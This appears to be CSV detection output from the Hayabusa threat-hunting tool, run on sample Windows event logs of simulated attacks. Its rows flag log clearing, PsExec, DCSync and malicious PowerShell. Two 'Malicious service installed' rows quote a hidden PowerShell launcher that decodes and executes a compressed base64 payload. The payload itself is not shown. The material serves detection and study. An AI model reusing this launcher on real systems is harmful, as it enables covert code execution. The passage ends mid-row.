Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 
+09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named 
Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from 
